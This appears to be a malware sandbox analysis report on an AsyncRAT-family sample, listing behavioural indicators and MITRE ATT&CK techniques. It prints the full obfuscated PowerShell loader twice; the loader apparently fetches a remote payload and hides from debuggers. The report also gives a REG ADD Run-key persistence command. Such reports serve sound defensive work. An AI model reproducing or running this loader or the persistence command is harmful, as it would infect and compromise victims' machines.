max time kernel
149s -
max time network
156s -
windows10-2004_x64 -
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
11-11-2024 17:41
Static task
Behavioral task
Malware Config
| Edit by Vinom Rat
Asyncrat family
Blocklisted process makes network request 7 IoCs
flow pid Process 7 3992 powershell.exe 33 3384 msiexec.exe 35 3384 msiexec.exe 37 3384 msiexec.exe 40 3384 msiexec.exe 42 3384 msiexec.exe 44 3384 msiexec.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3992 powershell.exe 3976 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Monostomidae = "%Kaffekanderne% -windowstyle 1 $Communalizer=(gp -Path 'HKCU:\\Software\\Mariti231\\').Relates;%Kaffekanderne% ($Communalizer)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3384 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3976 powershell.exe 3384 msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4344 reg.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3992 powershell.exe 3992 powershell.exe 3976 powershell.exe 3976 powershell.exe 3976 powershell.exe 3384 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3976 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3992 powershell.exe Token: SeDebugPrivilege 3976 powershell.exe Token: SeDebugPrivilege 3384 msiexec.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3384 msiexec.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1164 wrote to memory of 3992 1164 cmd.exe 84 PID 1164 wrote to memory of 3992 1164 cmd.exe 84 PID 3976 wrote to memory of 3384 3976 powershell.exe 99 PID 3976 wrote to memory of 3384 3976 powershell.exe 99 PID 3976 wrote to memory of 3384 3976 powershell.exe 99 PID 3976 wrote to memory of 3384 3976 powershell.exe 99 PID 3384 wrote to memory of 2608 3384 msiexec.exe 102 PID 3384 wrote to memory of 2608 3384 msiexec.exe 102 PID 3384 wrote to memory of 2608 3384 msiexec.exe 102 PID 2608 wrote to memory of 4344 2608 cmd.exe 104 PID 2608 wrote to memory of 4344 2608 cmd.exe 104 PID 2608 wrote to memory of 4344 2608 cmd.exe 104
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dmningsanlg.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden " <#Sandyish Vaabenstyringssystemers Generalers nada Etheriform Ludicrousnesses Ationsafsnittenes #>;$Raketvrn='Strygeinstrumenters';<#Lifesavings Dybfrosne Amacrinal Sugariest Sarapes Voldtgtscenter #>; function Strblinde($Pancreatitic){If ($host.DebuggerEnabled) {$Retslokales223++;}$Silius=$Weber+$Pancreatitic.'Length' - $Retslokales223; for ( $Orbitonasal=4;$Orbitonasal -lt $Silius;$Orbitonasal+=5){$repositioning=$Orbitonasal;$Cabresto+=$Pancreatitic[$Orbitonasal];}$Cabresto;}function wamfle($Cipo){ & ($Klinkende90) ($Cipo);}$Salpingopalatine=Strblinde 'J kaM Anso ebuzPyrriGausldanglBlena Lem/Lenk ';$Sydafrikaopholds236=Strblinde ' In,T P elFlaksRhin1Glyc2Damp ';$Mikroskoperings='Kha [Un lNFlyteLivetProt.UnfeS StaEBusyrmyndvRahdiAfgicRes,EFragp Sn,oGe listupNsolvt Obem BagaMistNreweaPseuGHa fE dserS ir]Batt:Ste,:CertsR.seeTaktC RaauLynlr okti EksTOpsiYud,tPWaneRAageO OvetteleoHuckCOutpOMikrlAn b=Sup $MoroS,eskyOverdGrydAEssefBrndR RedIHabiKSk maR unO Pa.P HutHCarlOPuk LRe tDm,tssHnge2Pri 3Amir6Av.c ';$Salpingopalatine+=Strblinde 'Slet5Voca. isk0B,ck Fina(DeltWNineiCissnAfm.dLogioWo cwKth.sR ad gardNPaneTKupe Stum1Ma,e0Cast. I.n0 Iri;rock haW B liFinen or6cyke4Spri;Lynf BundxRavr6Than4 .er; O,t Ext rHellv.ort:Pent1Ci.r3Inge1Pare.Kind0 Ko )Scar KnagGNanoePsyccH tek Be oExho/Ga o2Akti0 ave1Doss0Gama0C ok1Jeno0 Tal1Hove Sep.FPhoci AutrHor eFilif Hepo rebx ern/Unna1 Val3Vica1M,dt. gru0A un ';$Pretypify=Strblinde ' KunAPaasGWebsE .ilncockt ano ';$Reattaching42=Strblinde ' Terh DamtVo stChikpIn ssDobb:Begy/Maki/ Holf My i.ysglSynke Indd CennDand.UdtueUtiduSeng/ enslStra9 ObltKry EPrimwS,bsb qu9MucosQuar6maxia D sazoogRSuf.wI kv5Fo ufForuy StoULipoi Va a WakCAlle0FurblYtrifSamb/boulPBol.i marlR,gusOrd n BoreSwarr udfe ndnUnmesPrea.Hugim Oved aspJunk ';$dramatic=Strblinde ' Fll>Udst ';$Klinkende90=Strblinde 'VertIRe.aET icXDrag ';$Ridderbegrebets='Preadhere';$Kryolite='\Fistendes.Gld';wamfle (Strblinde 'Almo$ s nG estL oveO idnBIsa aFraclGran:Avi S.ockh,ckeo FinP agBTh,ooEpisY.aitSTur.=Aspa$ Fo,eGowknbarkV ati: AllA IdePBi kPFov DAntiAEnviTMeroaBv e+Vex.$PunyKOpveR Re,Y LuxOMi oL .aniSti tHrg,ES re ');wamfle (Strblinde 'S br$ ,ongDagulWh gofladBNonraf iflbrot:.ackaC,ueCFilliMetaNSkovEHu eTS ibaFataR p oIK.liAun e= Hex$Blo.R CameSumeAMom,tepsiTOve a ystCquothAntiITheoN M sGsluk4Dil 2 at.BaltSSensp SeklVandi Bjetdrme( Aff$Triudhy eRAuriASimoM Fora olT.rigiKrumcBomm)Tuft ');wamfle (Strblinde $Mikroskoperings);$Reattaching42=$acinetaria[0];$Omstillings146=(Strblinde 'C,or$SemiGAmerlDio.O epobHeara nslT rm:DrabpPectrP rtIAfsgS Divt SemEAc i=MateNRepeEC ypWTrie-TincoAffubFrstJUnc ePylrcRottt F b SadosSan YPorts ,edTSi.ueInfrMSnab. dioN.istEInt,T Nat.S,agW askE,phebTherc VanL mi.i .ndEKandNI,cut li ');wamfle ($Omstillings146);wamfle (Strblinde ',bei$AssiP Ny,rViduiBasisBrugtTilsePh s.CoxiHdidaeBlndaPattdTetreNonarHakasOpla[Hobo$ ensPakkvr BoleTjantbutyyPharpPresiUnc fDispyCowr] Bjf=p te$,ittSSkrtaBlinlbernpDyk,iTrannS mbgCr noBrecpHaria rselFordaUn dtEkspiPicin,rede rg ');$Ripensere=Strblinde 'Vi u$BackPAspirS rui MaisBethtsmoceinsc.SkruD.esio E,awj nlnSenilNo po Cirasnusd UriF BesiLok l kaePoz (L ke$ Co R SteeRetsa SiktFaset KryaBa,icKnudhArneiLar ndrosgOver4A.on2 aar,Flag$S ifAubevuPar.ti.riotil.rHaaniErritBedoefis tBryo) Mil ';$Autoritet=$Shopboys;wamfle (Strblinde 'Tar,$HelngSemilUdlaO genBImplALeucLUd a:NysgtUinde StoKA stSBeloTBusha ,anNO vim,dkrR BiokOd lN St iPhotNMercgOscieDiphr EteNGn sEMo.kSPoly= Tk.(Orn,tHaanEAnglSHetzt Rig-BalsPNew,AGeneTBalkh,lmu Arm $ Cona,onoUFormtAkkvo Gu ROv ri SubTDem.E InbTSp.b)B nk ');while (!$tekstanmrkningernes) {wamfle (Strblinde 'Prec$Su,jgUnrilkasioSitubPodoa ennlNeur: NotT SameTamil.oduaformu jentBetnoA chmE.egaEntht xoti isocInaxabundlMoral Many Kon=D ad$bar,tScrirMiliu iggeChi. ') ;wamfle $Ripensere;wamfle (Strblinde ' In,SGrifTKnicagnavRAutot Fic- ettSSkoslGibbeD seEHoinPFo.b Cyan4 con ');wamfle (Strblinde 'Srmr$Kat.GCastl BeboMoolb UncASpaglTryk:Kin,ToffeE KnlkS ers enntstdlaSim.n icrm SabRSlu KDe tnWaugIDisoNSe.sG riEProbrSemiNKomme ReksBolo=Vris( Hj tSalveH poS legtBalu-DesiPVi iAAftaTSluthSolm Tele$ Br.ARei.UCon tOverOFoderUdviiVedrTSkriEdis,tNonp) nke ') ;wamfle (Strblinde ' Am $Salig Heal f.jO agrbS raALandLbr e:Dis SFibrt PleASpleaFlaglEnkeo Te,R PolMS resHere= Shr$,alagRancLRelaOSpejbR,deaBra lOver:presrSer,e Anfi SheNTerptTrouE alR ubdrSpidUDeripArentRobbiP umO MobnTppe+ Inf+C ke% rim$Rid APa tCDiapi ,ornCeleeInd t PurASpilrAl eI,kovaSoda. awpCSeksoM ltUOp,aNfemitRech ') ;$Reattaching42=$acinetaria[$Staalorms];}$Verves=322677;$Subarmale=31127;wamfle (Strblinde ' San$NonhgMaalLBuddo FjoB ,omaU,dylUnde:OmgakAvocRA tiLEndonAntiI SlrN BraGKommSst e Vi,d=Tru. GalGAcideSliptExtr- koCSupeOP ran .idT br eE,opNGrenTbchu Xys$Stanacatuu TatTL.etOEm,lr Li iCir.tnahueVeksT Ana ');wamfle (Strblinde 'gyro$FilagForgl BreoUnmobA neala,elAn.t:Ci erMidmeWeakcSupeo rommKurspRegieSyn nHa.vsT eoe BurdSona ,tra=Kvik Avow[PartSnattyHocksPar t aideFairmUngo. In,CJu.eo Re rK.rat Hak]Glyc:Vejr:UnasF,navrMa,roDowlmUp aBK.ntaBordsA.ste Oak6Punc4,oncS zeftGuldrOrt, PisgOmb.(Lavi$T.llKM nurDre.lDenin Co i yrunChikgSkybs P,t)Hisp ');wamfle (Strblinde 'Pass$FjerGS,ill BumORu mBAcinA p,rlProp:A.toJ EcoOOrb ROc udFremS FrdkRullR A fESelsd InssHaemSarbeEProgJTrylrR dieStr sno.e Equa=sv v Trep[CoafsPerayTor sUd,aTDeskeRetaMFu n.SolbtShorESkyrx MegTKlej.BrawEBegln.kjoCUndeO Un dGlimi.rocn DonGCruc]Pseu:Skrk:Demia ,nds ostcTyraiReafIB,on.JugggSal EUnbit A dS MestSon rBabeiRigdN D pg Men( A o$ ysirI,fueT,aeC VugoOverMLndePLignEChreNSep sAlkoeDatadTon )Cyt. ');wamfle (Strblinde 'Redu$TllegBranl Af o ndbFam A ellL Lic: DebeLv kF UdefBarneHoejkSkeltTarrsSt d=Beas$OpvaJ .knOB,anR rdsd BecS irckP.otRAdoxESortdCommS IguSForhe KonJUre RV.dlE KaosBrin.enersDo eUPresB Re.sAntiTPresRudstiMesoNI eaGUnsp(S,us$ eveVHyk.e UncrSp,tvalsiEA kysGue,,T.ot$De.ySBlinUKollBD opaStrir resmemisa .ilLBedlEO,or)Ruft ');wamfle $Effekts;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Sandyish Vaabenstyringssystemers Generalers nada Etheriform Ludicrousnesses Ationsafsnittenes #>;$Raketvrn='Strygeinstrumenters';<#Lifesavings Dybfrosne Amacrinal Sugariest Sarapes Voldtgtscenter #>; function Strblinde($Pancreatitic){If ($host.DebuggerEnabled) {$Retslokales223++;}$Silius=$Weber+$Pancreatitic.'Length' - $Retslokales223; for ( $Orbitonasal=4;$Orbitonasal -lt $Silius;$Orbitonasal+=5){$repositioning=$Orbitonasal;$Cabresto+=$Pancreatitic[$Orbitonasal];}$Cabresto;}function wamfle($Cipo){ & ($Klinkende90) ($Cipo);}$Salpingopalatine=Strblinde 'J kaM Anso ebuzPyrriGausldanglBlena Lem/Lenk ';$Sydafrikaopholds236=Strblinde ' In,T P elFlaksRhin1Glyc2Damp ';$Mikroskoperings='Kha [Un lNFlyteLivetProt.UnfeS StaEBusyrmyndvRahdiAfgicRes,EFragp Sn,oGe listupNsolvt Obem BagaMistNreweaPseuGHa fE dserS ir]Batt:Ste,:CertsR.seeTaktC RaauLynlr okti EksTOpsiYud,tPWaneRAageO OvetteleoHuckCOutpOMikrlAn b=Sup $MoroS,eskyOverdGrydAEssefBrndR RedIHabiKSk maR unO Pa.P HutHCarlOPuk LRe tDm,tssHnge2Pri 3Amir6Av.c ';$Salpingopalatine+=Strblinde 'Slet5Voca. isk0B,ck Fina(DeltWNineiCissnAfm.dLogioWo cwKth.sR ad gardNPaneTKupe Stum1Ma,e0Cast. I.n0 Iri;rock haW B liFinen or6cyke4Spri;Lynf BundxRavr6Than4 .er; O,t Ext rHellv.ort:Pent1Ci.r3Inge1Pare.Kind0 Ko )Scar KnagGNanoePsyccH tek Be oExho/Ga o2Akti0 ave1Doss0Gama0C ok1Jeno0 Tal1Hove Sep.FPhoci AutrHor eFilif Hepo rebx ern/Unna1 Val3Vica1M,dt. gru0A un ';$Pretypify=Strblinde ' KunAPaasGWebsE .ilncockt ano ';$Reattaching42=Strblinde ' Terh DamtVo stChikpIn ssDobb:Begy/Maki/ Holf My i.ysglSynke Indd CennDand.UdtueUtiduSeng/ enslStra9 ObltKry EPrimwS,bsb qu9MucosQuar6maxia D sazoogRSuf.wI kv5Fo ufForuy StoULipoi Va a WakCAlle0FurblYtrifSamb/boulPBol.i marlR,gusOrd n BoreSwarr udfe ndnUnmesPrea.Hugim Oved aspJunk ';$dramatic=Strblinde ' Fll>Udst ';$Klinkende90=Strblinde 'VertIRe.aET icXDrag ';$Ridderbegrebets='Preadhere';$Kryolite='\Fistendes.Gld';wamfle (Strblinde 'Almo$ s nG estL oveO idnBIsa aFraclGran:Avi S.ockh,ckeo FinP agBTh,ooEpisY.aitSTur.=Aspa$ Fo,eGowknbarkV ati: AllA IdePBi kPFov DAntiAEnviTMeroaBv e+Vex.$PunyKOpveR Re,Y LuxOMi oL .aniSti tHrg,ES re ');wamfle (Strblinde 'S br$ ,ongDagulWh gofladBNonraf iflbrot:.ackaC,ueCFilliMetaNSkovEHu eTS ibaFataR p oIK.liAun e= Hex$Blo.R CameSumeAMom,tepsiTOve a ystCquothAntiITheoN M sGsluk4Dil 2 at.BaltSSensp SeklVandi Bjetdrme( Aff$Triudhy eRAuriASimoM Fora olT.rigiKrumcBomm)Tuft ');wamfle (Strblinde $Mikroskoperings);$Reattaching42=$acinetaria[0];$Omstillings146=(Strblinde 'C,or$SemiGAmerlDio.O epobHeara nslT rm:DrabpPectrP rtIAfsgS Divt SemEAc i=MateNRepeEC ypWTrie-TincoAffubFrstJUnc ePylrcRottt F b SadosSan YPorts ,edTSi.ueInfrMSnab. dioN.istEInt,T Nat.S,agW askE,phebTherc VanL mi.i .ndEKandNI,cut li ');wamfle ($Omstillings146);wamfle (Strblinde ',bei$AssiP Ny,rViduiBasisBrugtTilsePh s.CoxiHdidaeBlndaPattdTetreNonarHakasOpla[Hobo$ ensPakkvr BoleTjantbutyyPharpPresiUnc fDispyCowr] Bjf=p te$,ittSSkrtaBlinlbernpDyk,iTrannS mbgCr noBrecpHaria rselFordaUn dtEkspiPicin,rede rg ');$Ripensere=Strblinde 'Vi u$BackPAspirS rui MaisBethtsmoceinsc.SkruD.esio E,awj nlnSenilNo po Cirasnusd UriF BesiLok l kaePoz (L ke$ Co R SteeRetsa SiktFaset KryaBa,icKnudhArneiLar ndrosgOver4A.on2 aar,Flag$S ifAubevuPar.ti.riotil.rHaaniErritBedoefis tBryo) Mil ';$Autoritet=$Shopboys;wamfle (Strblinde 'Tar,$HelngSemilUdlaO genBImplALeucLUd a:NysgtUinde StoKA stSBeloTBusha ,anNO vim,dkrR BiokOd lN St iPhotNMercgOscieDiphr EteNGn sEMo.kSPoly= Tk.(Orn,tHaanEAnglSHetzt Rig-BalsPNew,AGeneTBalkh,lmu Arm $ Cona,onoUFormtAkkvo Gu ROv ri SubTDem.E InbTSp.b)B nk ');while (!$tekstanmrkningernes) {wamfle (Strblinde 'Prec$Su,jgUnrilkasioSitubPodoa ennlNeur: NotT SameTamil.oduaformu jentBetnoA chmE.egaEntht xoti isocInaxabundlMoral Many Kon=D ad$bar,tScrirMiliu iggeChi. ') ;wamfle $Ripensere;wamfle (Strblinde ' In,SGrifTKnicagnavRAutot Fic- ettSSkoslGibbeD seEHoinPFo.b Cyan4 con ');wamfle (Strblinde 'Srmr$Kat.GCastl BeboMoolb UncASpaglTryk:Kin,ToffeE KnlkS ers enntstdlaSim.n icrm SabRSlu KDe tnWaugIDisoNSe.sG riEProbrSemiNKomme ReksBolo=Vris( Hj tSalveH poS legtBalu-DesiPVi iAAftaTSluthSolm Tele$ Br.ARei.UCon tOverOFoderUdviiVedrTSkriEdis,tNonp) nke ') ;wamfle (Strblinde ' Am $Salig Heal f.jO agrbS raALandLbr e:Dis SFibrt PleASpleaFlaglEnkeo Te,R PolMS resHere= Shr$,alagRancLRelaOSpejbR,deaBra lOver:presrSer,e Anfi SheNTerptTrouE alR ubdrSpidUDeripArentRobbiP umO MobnTppe+ Inf+C ke% rim$Rid APa tCDiapi ,ornCeleeInd t PurASpilrAl eI,kovaSoda. awpCSeksoM ltUOp,aNfemitRech ') ;$Reattaching42=$acinetaria[$Staalorms];}$Verves=322677;$Subarmale=31127;wamfle (Strblinde ' San$NonhgMaalLBuddo FjoB ,omaU,dylUnde:OmgakAvocRA tiLEndonAntiI SlrN BraGKommSst e Vi,d=Tru. GalGAcideSliptExtr- koCSupeOP ran .idT br eE,opNGrenTbchu Xys$Stanacatuu TatTL.etOEm,lr Li iCir.tnahueVeksT Ana ');wamfle (Strblinde 'gyro$FilagForgl BreoUnmobA neala,elAn.t:Ci erMidmeWeakcSupeo rommKurspRegieSyn nHa.vsT eoe BurdSona ,tra=Kvik Avow[PartSnattyHocksPar t aideFairmUngo. In,CJu.eo Re rK.rat Hak]Glyc:Vejr:UnasF,navrMa,roDowlmUp aBK.ntaBordsA.ste Oak6Punc4,oncS zeftGuldrOrt, PisgOmb.(Lavi$T.llKM nurDre.lDenin Co i yrunChikgSkybs P,t)Hisp ');wamfle (Strblinde 'Pass$FjerGS,ill BumORu mBAcinA p,rlProp:A.toJ EcoOOrb ROc udFremS FrdkRullR A fESelsd InssHaemSarbeEProgJTrylrR dieStr sno.e Equa=sv v Trep[CoafsPerayTor sUd,aTDeskeRetaMFu n.SolbtShorESkyrx MegTKlej.BrawEBegln.kjoCUndeO Un dGlimi.rocn DonGCruc]Pseu:Skrk:Demia ,nds ostcTyraiReafIB,on.JugggSal EUnbit A dS MestSon rBabeiRigdN D pg Men( A o$ ysirI,fueT,aeC VugoOverMLndePLignEChreNSep sAlkoeDatadTon )Cyt. ');wamfle (Strblinde 'Redu$TllegBranl Af o ndbFam A ellL Lic: DebeLv kF UdefBarneHoejkSkeltTarrsSt d=Beas$OpvaJ .knOB,anR rdsd BecS irckP.otRAdoxESortdCommS IguSForhe KonJUre RV.dlE KaosBrin.enersDo eUPresB Re.sAntiTPresRudstiMesoNI eaGUnsp(S,us$ eveVHyk.e UncrSp,tvalsiEA kysGue,,T.ot$De.ySBlinUKollBD opaStrir resmemisa .ilLBedlEO,or)Ruft ');wamfle $Effekts;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3976 -
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Monostomidae" /t REG_EXPAND_SZ /d "%Kaffekanderne% -windowstyle 1 $Communalizer=(gp -Path 'HKCU:\Software\Mariti231\').Relates;%Kaffekanderne% ($Communalizer)"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Monostomidae" /t REG_EXPAND_SZ /d "%Kaffekanderne% -windowstyle 1 $Communalizer=(gp -Path 'HKCU:\Software\Mariti231\').Relates;%Kaffekanderne% ($Communalizer)"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...